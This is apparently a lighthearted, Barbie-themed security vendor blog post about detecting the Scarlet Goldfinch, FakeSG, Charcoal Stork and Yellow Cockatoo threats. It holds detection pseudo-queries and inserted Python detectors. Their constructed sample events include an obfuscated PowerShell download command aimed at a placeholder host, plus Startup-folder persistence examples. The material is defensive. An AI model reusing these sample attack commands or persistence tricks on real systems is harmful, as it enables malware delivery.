Today, as we celebrate the birthday of the one and only Ryan Gosling, let’s shimmy into the thrilling world of threat detection with a little Barbie twist. With this Gosling-inspired nod, we’re channeling the smooth, unflinching confidence of a cyber-Ken.
So, let’s grab our security surfboards, show a little Ken-ergy, and dive in with the help of our two favorite Barbies: STEM Barbie (Mak Foss) and Bookworm Barbie (Rachel Schwalk). Are you ready to see if your threat defenses are “Kenough”?
Scarlet Goldfinch and FakeSG: The copycat browser hijackers
Let’s start with Scarlet Goldfinch and FakeSG—two copycat browser-update-themed threats that are about as welcome as a glitter explosion on your favorite cybersecurity dashboard. First observed by Red Canary in June 2023, Scarlet Goldfinch initially leveraged batch scripts and then switched to PowerShell in late 2023. It eventually leads to NetSupport Manager as its payload.
On the other hand, FakeSG utilizes URL shortcuts, HTA files, and PowerShell for payload downloads, favoring NetSupport Manager as its go-to payload.
Both threats play on compromised websites, luring unsuspecting users into clicking malicious browser update pop-ups. Once clicked, the fun begins—JavaScript files and HTA files launch, leading to the download of malicious payloads, often wrapped in obfuscated PowerShell commands.
Persistence: Scarlet Goldfinch establishes persistence through registry run keys, while FakeSG creates scheduled tasks to keep the malicious client active whenever the user logs in.
Detection opportunities
Scarlet Goldfinch
Script execution from Explorer’s built-in ZIP function: Look for WScript executing JavaScript files in temp folders and app data, a tell-tale sign of mischief.
parent_process == (explorer.exe)
&&
process == (wscript.exe)
&&
command_line_includes ( users || temp) && (.zip || .js)
&&
has_netconn
FakeSG
MSHTA spawning PowerShell: The Microsoft HTML Application (MSHTA) executable (mshta.exe) is a legitimate utility for running HTML-based applications but is often abused by adversaries to download and execute malicious scripts from the web, especially alongside PowerShell.
Process == mshta.exe
&&
Child_process == powershell.exe
NetSupport Manager out of unusual directories: If you don’t use NetSupport Manager, any instance of client32.exe (the executable name for NetSupport Manager) could be malicious, especially if it’s running from somewhere other than the Program Files directory.
Process == client32.exe
&&
Process_path does_not_include ('Program Files')
Both (& other prevalent threats)
PowerShell downloads from external resources: Keep an eye out for PowerShell calling external downloads via New-Object System.Net.WebClient. If it’s followed by Base64 string obfuscation, you’ve likely got trouble.
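The Scarlet Goldfinch, FakeSG and shared PowerShell analytics above, turned into an added, runnable example (this is not Red Canary’s detection code): each pseudo-query becomes a predicate over a normalized process event, and the PowerShell rule also decodes an -EncodedCommand blob so the WebClient call is found even when it is hidden. The field names and the sample events are assumptions constructed for the example.

```python
import base64
import re

def _lc(ev, key):  # lower-cased string field of a normalized process event, "" if absent
    return str(ev.get(key) or "").lower()

def explorer_wscript_temp_script(ev):
    """Scarlet Goldfinch: Explorer -> WScript on a .zip/.js under users/temp, with a network connection."""
    cmd = _lc(ev, "command_line")
    return (_lc(ev, "parent_process") == "explorer.exe" and _lc(ev, "process") == "wscript.exe"
            and any(p in cmd for p in ("users", "temp")) and any(x in cmd for x in (".zip", ".js"))
            and bool(ev.get("has_netconn")))
def mshta_spawns_powershell(ev):  # FakeSG: mshta.exe with a powershell.exe child
    return _lc(ev, "process") == "mshta.exe" and _lc(ev, "child_process") == "powershell.exe"
def netsupport_outside_program_files(ev):  # FakeSG: client32.exe anywhere except Program Files
    return _lc(ev, "process") == "client32.exe" and "program files" not in _lc(ev, "process_path")

_ENC = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{40,})", re.I)  # -enc <Base64 blob>
def powershell_webclient_base64(ev):
    """Both: PowerShell reaching System.Net.WebClient together with Base64 obfuscation."""
    if _lc(ev, "process") != "powershell.exe":
        return False
    cmd = ev.get("command_line") or ""
    m = _ENC.search(cmd)
    if m:  # PowerShell encodes -enc payloads as UTF-16LE; the WebClient call usually hides in there
        try:
            cmd += base64.b64decode(m.group(1)).decode("utf-16-le", "ignore")
        except ValueError:
            pass
    return "system.net.webclient" in cmd.lower() and (m is not None or "frombase64string" in cmd.lower())

RULES = {"scarlet_goldfinch_wscript": explorer_wscript_temp_script,
         "fakesg_mshta_powershell": mshta_spawns_powershell,
         "fakesg_netsupport_path": netsupport_outside_program_files,
         "powershell_webclient_b64": powershell_webclient_base64}

def run_rules(events, rules=RULES):  # per event, the names of the rules it triggers
    return [[name for name, fn in rules.items() if fn(ev)] for ev in events]

# Constructed sample events (not real telemetry); the last one hides the download inside -enc.
_ENCODED = base64.b64encode(
    "(New-Object System.Net.WebClient).DownloadString('http://example.invalid/p')".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"parent_process": "explorer.exe", "process": "wscript.exe", "has_netconn": True,
     "command_line": r'wscript.exe "C:\Users\ken\AppData\Local\Temp\Update.zip\Update.js"'},
    {"process": "mshta.exe", "child_process": "powershell.exe"},
    {"process": "client32.exe", "process_path": r"C:\Users\ken\AppData\Roaming\client32.exe"},
    {"process": "client32.exe", "process_path": r"C:\Program Files\NetSupport\client32.exe"},  # benign install
    {"process": "powershell.exe", "command_line": "powershell.exe -nop -w hidden -enc " + _ENCODED},
]
```

Calling run_rules(SAMPLE_EVENTS) flags the first three events and the encoded PowerShell one, and leaves the Program Files install of client32.exe alone.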
Charcoal Stork: Not just another install
Charcoal Stork might sound whimsical, but this threat is the opposite of sparkly. This pay-per-install (PPI) provider caught attention in 2022 with its delivery of ChromeLoader, a browser hijacker that modifies browser settings and redirects traffic to malicious sites.
What’s worse? Charcoal Stork has evolved. In 2023, it started delivering a variety of payloads, from VBS files to MSI and EXE files, making it harder to pin down.
Persistence: Like Scarlet Goldfinch, Charcoal Stork loves registry run keys and LNK files in the startup folder to ensure the payload stays persistent.
Detection opportunities
NW.js executable running from AppData\Roaming: This behavior often indicates unwanted software, adware, or malware, because this directory is user-writable and needs no admin privileges to drop files into. Adversaries use this location to evade detection, establish persistence, and access sensitive data.
Process_name == nw.exe
&&
Process_path contains ('appdata\roaming')
Even better if you can use binary metadata:
binary_internal_name == ('nw_exe')
&&
Process_path contains ('appdata\roaming')
Browser hijacking behavior: Look for Chrome or Edge launching with unusual command-line arguments like --load-extension, which can force browser extensions to install without user interaction.
process == ('chrome.exe' || 'msedge.exe')
&&
command_includes ('--load-extension')
Yellow Cockatoo: The dynamic delivery
Yellow Cockatoo is an activity cluster that involves the execution of a .NET remote access trojan (RAT) that uses fileless delivery methods to infect systems at scale. The most unique part of Yellow Cockatoo’s attack? It customizes its malicious executable name based on the user’s search query. So, if you’re searching for “Barbie dreamhouse” you might just end up downloading a barbie-dreamhouse.exe RAT.
Once installed, Yellow Cockatoo spawns PowerShell to decrypt and load malicious code directly into memory—no files on disk, making it especially sneaky.
Persistence: Yellow Cockatoo creates .lnk files in the startup folder, ensuring its malware runs whenever the user reboots the machine.
Detection opportunities
PowerShell with suspicious obfuscation: Look for PowerShell scripts using AES cryptography or Base64 obfuscation, particularly when paired with calls to external resources.
process == powershell.exe
&&
command_includes ('appdata')
&&
filemod_path_includes ('start menu\programs\startup')
&&
filemod_extension == '.lnk'
Unusual .NET methods: Detect loading of suspicious .NET methods in PowerShell scripts, especially if they include System.Security.Cryptography.AesManaged or System.IO.MemoryStream.
process_name == powershell.exe
&&
scriptload_content_contains ('aescryptoserviceprovider' || 'frombase64string' || 'user32.dll')
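The Charcoal Stork and Yellow Cockatoo analytics above, as an added runnable example (not Red Canary’s detection code) over constructed, normalized events: binary metadata and path for NW.js, the Startup-folder .lnk file modification, and script-load content. It goes one step further than the --load-extension pseudo-query by parsing the extension directories out of the switch so an analyst can see what was side-loaded. Field names and the sample events are assumptions.

```python
import re

def _lc(ev, key):  # lower-cased string field of a normalized event, "" if absent
    return str(ev.get(key) or "").lower()

def nwjs_from_roaming(ev):
    """Charcoal Stork: NW.js, by internal name (preferred) or file name, running under AppData\\Roaming."""
    is_nw = _lc(ev, "binary_internal_name") == "nw_exe" or _lc(ev, "process_name") == "nw.exe"
    return is_nw and "appdata\\roaming" in _lc(ev, "process_path")

_LOAD_EXT = re.compile(r'--load-extension(?:=|\s+)("[^"]+"|\S+)', re.I)

def browser_load_extension(ev):
    """Charcoal Stork: Chrome/Edge started with --load-extension; returns the extension dirs, else None."""
    if _lc(ev, "process") not in ("chrome.exe", "msedge.exe"):
        return None
    m = _LOAD_EXT.search(ev.get("command_line") or "")
    return m.group(1).strip('"').split(",") if m else None  # Chromium takes a comma-separated list

def startup_lnk_from_powershell(ev):
    """Yellow Cockatoo persistence: PowerShell referencing AppData writes a .lnk into the Startup folder."""
    return (_lc(ev, "process") == "powershell.exe" and "appdata" in _lc(ev, "command_line")
            and "start menu\\programs\\startup" in _lc(ev, "filemod_path")
            and _lc(ev, "filemod_extension") == ".lnk")

_SUSPICIOUS = ("aescryptoserviceprovider", "frombase64string", "user32.dll")

def powershell_crypto_scriptload(ev):
    """Yellow Cockatoo: which AES/Base64/user32 references appear in script content PowerShell loaded."""
    if _lc(ev, "process_name") != "powershell.exe":
        return []
    content = _lc(ev, "scriptload_content")
    return [s for s in _SUSPICIOUS if s in content]

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"process_name": "nw.exe", "binary_internal_name": "nw_exe",
     "process_path": r"C:\Users\ken\AppData\Roaming\Updater\nw.exe"},
    {"process": "chrome.exe", "command_line": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
     r'--load-extension="C:\Users\ken\AppData\Local\ext1,C:\Users\ken\AppData\Local\ext2" --no-first-run'},
    {"process": "powershell.exe", "command_line": r"powershell -w hidden -f C:\Users\ken\AppData\Roaming\u.ps1",
     "filemod_path": r"C:\Users\ken\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u.lnk",
     "filemod_extension": ".lnk"},
    {"process_name": "powershell.exe", "scriptload_content":
     "$aes = New-Object System.Security.Cryptography.AesCryptoServiceProvider; $k = [Convert]::FromBase64String($b)"},
]
```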
Lifeguard Ken: Help your users surf the web safely
No matter how confident or glamorous the threat, a solid security baseline is your best defense. Here are a few proactive measures to help you out:
- Set the default application for JavaScript (.js) files to Notepad. This simple trick can halt script-based malware in its tracks.
- Application allow-listing. Allow-list trusted applications, and block unauthorized ones. It’s tough but worth it.
- Disable auto-mounting of ISO files. Many attacks start by tricking users into downloading ISO files that auto-mount. Disabling this prevents them from executing.
- User education. Teach users that barbie-dreamhouse.exe is probably not a safe download.
Final thoughts
While Ken might not be the first security thought leader you’d turn to, he knows how to stay vigilant. From browser hijackers to fileless malware, today’s threats are evolving faster than Barbie’s wardrobe. By following detection opportunities and prevention measures, you can keep your network safe from even the craftiest cyber adversaries.
So, is your security Kenough? Download the Red Canary 2024 Threat Detection Report and find out!
And remember, always be cautious when searching the internet for your dreamhouse. You never know when a Yellow Cockatoo might swoop in.